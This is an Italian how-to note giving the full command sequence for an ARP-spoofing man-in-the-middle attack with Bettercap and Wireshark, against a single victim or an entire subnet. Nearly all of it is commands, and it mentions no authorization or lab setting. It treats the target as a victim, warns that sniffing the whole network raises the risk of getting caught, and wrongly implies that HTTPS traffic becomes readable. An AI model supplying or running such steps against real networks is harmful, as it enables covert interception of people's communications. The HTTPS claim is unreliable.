tags: Bettercap ARP_spoofing wireshark Intercettazione_traffico
Un attacco MitM permette a un attaccante di intercettare e potenzialmente manipolare le comunicazioni tra due parti. In questo scenario, ci concentreremo sull’intercettazione del traffico di un utente nella subnet che naviga su internet. Utilizzeremo Bettercap per eseguire l’attacco di ARP spoofing e Wireshark per analizzare il traffico intercettato.
Per prima cosa dobbiamo trovarci l’IP del Router e lo possiamo fare tramite questo comando:
ip route show | grep defaultOra bisogna consentire al PC di inoltrare il traffico intercettato verso la destinazione legittima, per evitare blocchi nella connessione:
sudo sysctl -w net.ipv4.ip_forward=1
#Oppure
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
Ora installiamo Bettercap:
sudo apt update && sudo apt install bettercapUna volta installato il programma possiamo eseguire il seguente programma per avviarlo:
sudo bettercap -iface wlan0Una volta aperto possiamo lanciare i seguenti comandi:
#Per attaccare un solo obbiettivo:
net.probe on
set arp.spoof.targets <IP_target>,<IP_gateway>
arp.spoof on
net.sniff on
#Per attaccare tutta la rete:
net.probe on
set arp.spoof.targets 192.168.1.0/24 # subnet completa
arp.spoof on
net.sniff onChiaramente sniffare il traffico di tutta la rete crea molto più rumore e rischio di farsi sgamare
Una volta lanciati questi comandi tutto il traffico https tra vittima e router ci apparirà a schermo oppure tramite Wireshark.
Non appena si è finito l’attacco possiamo ridisattivare il portforwarding tramite:
sudo sysctl -w net.ipv4.ip_forward=0